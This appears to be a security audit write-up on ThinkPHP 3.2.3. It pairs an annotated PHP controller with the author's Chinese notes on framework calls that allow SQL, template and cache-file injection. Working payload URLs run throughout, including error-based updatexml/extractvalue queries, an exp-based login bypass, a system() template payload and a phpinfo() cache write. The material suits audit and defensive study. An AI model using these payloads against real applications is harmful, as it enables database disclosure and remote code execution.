ThinkPHP 3.2.3 代码审计

<?php
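// ThinkPHP 3.2 convention: controllers of the Home module live in Home\Controller
// and extend Think\Controller. The backslashes had been dropped ("HomeController",
// "ThinkController"), which leaves `Controller` unresolved when the class is loaded.
namespace Home\Controller;
use Think\Controller;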
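/**
 * Audit notebook for ThinkPHP 3.2.3 injection sinks.
 *
 * The only executable statement in index() is $this->display(); everything
 * else is commented-out code reproducing the vulnerable patterns described by
 * the numbered notes (SQL injection through where/table/field/order/comment,
 * the exp/_string/_query condition forms, a template issue and cache-file
 * writes). The notes were translated from Chinese; payload URLs and generated
 * SQL are kept exactly as the author recorded them.
 *
 * Common mitigation for the SQL items: request data must never choose a table,
 * column, alias, operator or SQL fragment -- cast scalars with the filter
 * argument of I() (e.g. I('id', 1, 'intval')) and whitelist identifiers.
 */
class UserController extends Controller
{
    /**
     * Default action: renders the template and carries the audit notes.
     *
     * The original file did not parse: raw `<?php ... ?>` lines sat inside the
     * method body, a `//` comment contained `?>` (which ends PHP mode), and the
     * large block comment was terminated early by the end-of-comment marker
     * that appears inside the SQL comment example of item 6. The notes below
     * are rearranged so that every `?>` sits inside a block comment and the
     * SQL comment example sits inside a line comment.
     */
    public function index(/*$id*/)
    {
        $this->display();

        // 15. Cache write through S(): the value is written into a file under
        //     Runtime/Temp (the file name can be recovered with cmd5); as the
        //     payload shows, a newline in the value breaks out of the serialized string.
        // S('a',I('id')); //http://127.0.0.1/tp/index.php/home/index/test?id=%0Aphpinfo%28%29//
        /* The generated cache file then reads:
        <?php
        //000000000000s:12:"
        phpinfo()//";
        ?>
        */

        // 14. F() writes its value verbatim to a cache file at runtime/key.php.
        /* F('key','<?php phpinfo();?>'); */

        // 13. Template issue: assign() with a caller-controlled array lets the request
        //     set _content; only effective with 'TMPL_ENGINE_TYPE' => 'php'
        //     (the default engine is Think).
        //        $name = $_GET['name'];
        //        $this->assign($name);
        //        $this->display('index');
        /* payload: http://127.0.0.1/tp/index.php/home/user/index?name[_content]=<?php system('type index.php');;?> */

        // 12. _query is controllable:
        //     SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )
        //        $map['id'] = 5;
        //        $map['_query']='username=afanti&score=10';
        //        $data = M('user')->where($map)->select();
        //        dump($data);
        // 12. Combined injection via _string: http://127.0.0.1/tp/index.php/home/user/index?id=5&username=afanti
        //     SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )
        //        $map['id'] = I('id');
        //        $map['_string'] = 'username='."'".I('username')."'";
        //        $data = M('user')->where($map)->select();
        //        dump($data);

        // 11. setInc() injection
        //        $user = M("user");
        //        $user->where('id=5')->setInc('sorce'.I('num'));

        // 10. Injection through bound action parameters; grep public\s+function\s+[\w_]+\(\$
        //        if(intval($id)>0)
        //        {
        //            $data = M('user')->where('id='.$id)->select();  // ?id=1) bypasses the check directly
        //            dump($data);
        //        }

        // 9. exp injection
        //      $data = array();
        //    $data['user'] = $_POST['username'];
        //    $data['pass'] = md5($_POST['password']);   // username[0]=exp&username[1]=aa'or 1=1%23&password=1
        //    M('user')->where($data)->find();
        //
        //      $res = M('member')->where(array('id'=>$_GET['userid']))->count();   // userid[0]=exp&userid[1]=aaaaaa
        //
        ////        $map['id']=I('id');   // exp does not work this way
        //        $map['id'] = $_GET['id'];            // http://127.0.0.1/tp/index.php/home/user/index?id[0]=exp&id[1]=aaaaaa
        //        $data = M('user')->where($map)->select();
        //        dump($data);

        // 8. Aggregate functions: SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1   ?par=*
        //    query()/execute() also accept raw SQL.
        //        M('user')->count(I('par'));

        // 7. Index injection
        //$Model->index(I('user'))->select();

        // 6. comment: SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) /* 111111111 */    comment=111111111
        //        M('user')->comment(I('comment'))->where('1=1')->select();

        // 5. order/group/having controllable: SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` asc   ?orderby=asc
        //        M('user')->where('1=1')->order(array('id'=>I('orderby')))->select();

        // 4. grep ->(alias|join|union)\s*\((\$|\$_|I) to find alias/join/union calls with controllable arguments
        //          M('user')->field(I('id'))->union('select 1 from thinkphp_user')->select();

        // 3. field: SELECT `id` FROM `thinkphp_user` WHERE ( 1=1 )   id controllable
        //        M('user')->field(I('id'))->where('1=1')->select();
        //    SELECT `id`,`username` AS `uname` FROM `thinkphp_user`   alias: ?name=uname`a raises an error
        //         M('user')->field(array('id','username'=>I('name')))->select();

        // 2. table: ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (select @@version),0x7e)))-- -a   (the table must exist)
        //            M()->table(I('biao'))->where('1=1')->select();

        // 1. Concatenating straight into where() is injectable
        //          $data = M('user')->where("id=".I('id'))->select();
        //          dump($data);

        // Parameter binding (URL_PARAMS_BIND == true):
        //        $data = I('id','1','intval');
        //        echo $data;
        //        echo $id;   // http://127.0.0.1/tp/index.php/home/user/index/id/11111111 passes 11111
        //        echo "usercontroller";
    }
}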



  
 

1.where后直接拼接会产生注入

$data = M('user')->where("id=".I('id'))->select();

2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (select @@version),0x7e)))-- -a 表名必须存在。

M()->table(I('biao'))->where('1=1')->select();

3.field 参数可控

M('user')->field(I('id'))->where('1=1')->select(); //3.SELECT `id` FROM `thinkphp_user` WHERE ( 1=1 ) id可控导致注入

M('user')->field(array('id','username'=>I('name')))->select(); //3.field SELECT `id`,`username` AS `uname` FROM `thinkphp_user` //别名 ?name=uname`a报错

4.->(alias|join|union)\s*\((\$|\$_|I) 用正则查找 alias|join|union 参数可控制

M('user')->field(I('id'))->union('select 1 from thinkphp_user')->select();

5.order,group,having参数可控 SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` asc ---?orderby=asc

M('user')->where('1=1')->order(array('id'=>I('orderby')))->select();

6.comment注入 SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) /* 111111111 */ comment=111111111

M('user')->comment(I('comment'))->where('1=1')->select(); 

7.索引注入

$Model->index(I('user'))->select();

8.query、execute 和聚合函数支持原生的 SQL 语句

M('user')->count(I('par')); //聚合函数 SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1 ?par=*

9.exp注入

a.)

$data = array();

$data['user'] = $_POST['username']; 

$data['pass'] = md5($_POST['password']); payload: username[0]=exp&username[1]=aa'or 1=1%23&password=1

M('user')->where($data)->find();

b.)

$res = M('member')->where(array('id'=>$_GET['userid']))->count();   payload:  userid[0]=exp&userid[1]=aaaaaa

c.)通过 I 函数取参，exp 注入就不存在了

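// Uses I('userid') (the original read `$I(...)`, a variable function that does not exist):
// I() runs the input through the framework filter, so the array/exp form of 9.b no longer
// reaches where(); the scalar is then quoted by the array-condition builder.
$res = M('member')->where(array('id' => I('userid')))->count();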

10、参数传递注入 public\s+function\s+[\w_]+\(\$

public function index(/*$id*/)....

if(intval($id)>0)
{
 $data = M('user')->where('id='.$id)->select(); //?id=1) 直接绕过判断
 dump($data);
}
11.setInc注入

$user = M("user");
$user->where('id=5')->setInc('sorce'.I('num'));

12.组合注入

http://127.0.0.1/tp/index.php/home/user/index?id=5&username=afanti 

SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )

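// 12. Combined injection: I('id') filters the scalar, but _string is appended to the
// WHERE clause verbatim, so the quoted username built here is still injectable
// (generated SQL: SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )).
// Prefer the array form, array('username' => I('username')), which the framework quotes.
// `dump(data)` in the original referenced an undefined constant; it dumps $data.
$map = array();
$map['id'] = I('id');
$map['_string'] = 'username='."'".I('username')."'";
$data = M('user')->where($map)->select();
dump($data);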

13、_query参数可控

SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )

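// 13. _query is controllable: the query-string value is parsed into per-column
// conditions, so a caller who controls it can add arbitrary AND terms
// (SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )).
// `dump(data)` in the original referenced an undefined constant; it dumps $data.
$map = array();
$map['id'] = 5;
$map['_query'] = 'username=afanti&score=10';
$data = M('user')->where($map)->select();
dump($data);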

14、模板问题:http://127.0.0.1/tp/index.php/home/user/index?name[_content]=<?php system('type index.php');;?>

$name = $_GET['name'];
$this->assign($name); 
$this->display('index'); //'TMPL_ENGINE_TYPE' => 'php'才有效,默认是Think

15、在runtime/key.php

S('a',I('id')); //http://127.0.0.1/tp/index.php/home/index/test?id=%0Aphpinfo%28%29//
在Temp生成文件 生成的文件名字可到cmd5破解
<?php
//000000000000s:12:"
phpinfo()//";
?>
F('key','<?php phpinfo();?>'); 
$this->display();

ThinkPHP 3.2.3

跨控制器的方法R:

/**
 * Cross-controller call demo: A('User') yields a controller instance whose
 * index() is called directly, and R('User/index') reaches the same action
 * through the framework (per the original note, "跨控制器" = cross-controller).
 * Also echoes the `name` request parameter read through I().
 */
public function test()
{
    echo 'test', I('name');

    $rows = M('user')->where('id=1')->select();

    $userController = A('User');
    $userController->index();
    R('User/index'); // cross-controller call

    dump($rows);
}

 16.select、find、delete注入

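/**
 * 16. find()/select()/delete() injection.
 *
 * When the argument comes straight from I('id') and the caller sends the
 * parameter as an array (id[table]=..., id[alias]=..., id[where]=..., see the
 * payloads below), those keys are taken as query options and land in the
 * generated SQL. Mitigation: force a scalar before it reaches the model, e.g.
 * I('id', 0, 'intval'), or reject non-scalar input explicitly.
 *
 * The original read `i('id')`; the framework input helper is I().
 */
public function test()
{
    $id = I('id');
    $res = M('user')->find($id);
    //$res = M('user')->delete($id);
    //$res = M('user')->select($id);
}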
注入的payload:
table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
delete方法注入payload:
where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1
 
原文地址:https://www.cnblogs.com/afanti/p/9209018.html